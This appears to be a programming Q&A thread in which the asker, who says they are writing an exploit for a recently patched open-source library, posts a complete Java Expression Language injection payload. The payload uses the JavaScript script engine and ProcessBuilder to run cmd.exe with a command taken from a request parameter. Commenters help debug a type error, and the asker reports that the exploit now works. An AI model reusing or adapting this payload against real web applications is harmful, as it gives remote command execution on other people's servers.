# Exploit payload for expression language injection

Tags: java, tomcat, el, code-injection, exploit

http://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html shows a great way to get OS access via EL injection and I have used it many times with success.  The post says:

> Call the eval() method for the engine "JavaScript" that accepts JS code as string (sometimes Jetty 8.2 gives a “java.io.Reader”) with the JS code that executes the runtime command

I successfully ran the following payload against a JRE6 webapp running on Apache 8.0.15.0.

> ${session.setAttribute("scriptfactory","".getClass().forName("javax.script.ScriptEngineManager").newInstance())}${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/C\",\"".concat(request.getParameter("cmd")).concat("\"]).start()}

When I try that payload against JRE7 with Tomcat 7.0.37 I get a type exception

> Cannot convert var proc = new java.lang.ProcessBuilder"(java.lang.String[])".start(); of type class java.lang.String to class java.io.Reader

How can I handle with this within the confines of a one-liner that is using Java to call the Javascript engine?

Comment: Doesn't this "exploit" require a badly-programmed JSP page to blindly evaluate user input without taint-checking? At any rate, the page you linked to mentioned the `java.io.Reader` issue but doesn't say how to get around it – not that I can see. It looks like `ELProcessor` -- the code with the `eval` method -- was added in EL 3.0, and Tomcat 7 only has EL 2.2. I'm not sure what method it's matching in later versions, but it's apparently not there in Tomcat 7.

Comment: I'm writing an exploit so quotes aren't necessary.  The vulnerability resides in an open source library that was recently patched.  The eval method is successfully called in Tomcat 7, I just haven't figured out how to get around the issue it returns a reader rather than a string.  Thanks for your feedback.

Comment: It's not returning a `Reader`, it's finding a function (`eval`) which accepts a `Reader` and you have provided it with a `String` value. Unless you can write the code to convert the string value into a `Reader` (e.g. `java.io.StringReader`) then you won't make much more progress. Can you dump the name of the class you get when you fetch `scriptengine` from the session scope?

Comment: Restarting Tomcat resolved the issue.  The exploit works fine now.  Thanks for your help.